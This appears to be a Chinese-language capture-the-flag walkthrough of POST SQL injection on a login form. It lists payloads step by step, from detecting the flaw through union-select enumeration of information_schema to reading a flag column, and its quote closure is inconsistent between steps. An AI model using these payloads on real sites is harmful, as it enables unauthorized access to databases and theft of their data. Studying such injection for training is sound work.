POST注入流程
1.判斷是否存在注入
uname='&passwd=a&submit=Submit
錯誤回顯 => 存在注入
2.判斷引數型別
uname=1 or 1=1 #&passwd=a&submit=Submit
正確回顯
uname=1" or 1=1 #&passwd=a&submit=Submit
錯誤回顯 => 字元型
3.進行引數閉合
uname=1" or 1=1 #&passwd=a&submit=Submit
錯誤回顯
uname=1") or 1=1#&passwd=a&submit=Submit
登入回顯 => 閉合成功
4.檢視這個網站後臺資料庫所在的表有幾列
uname=' or 1=1 order by 2#&passwd=a&submit=Submit
正確回顯
uname=' or 1=1 order by 3#&passwd=a&submit=Submit
錯誤回顯 => 有2列
5.進行 union select聯合查詢,發現輸出位
uname='union select 1,2#&passwd=a&submit=Submit
6.檢視所在資料庫和資料庫版本
uname='union select database(),version()#&passwd=a&submit=Submit
7.檢視資料庫的表
uname='union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #&passwd=a&submit=Submit
8.檢視DPXE2rot表中的列
uname='union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="DPXE2rot" #&passwd=a&submit=Submit
9.查看錶中的flag列中的資料
uname='union select 1,flag from DPXE2rot limit 3,1 #&passwd=a&submit=Submit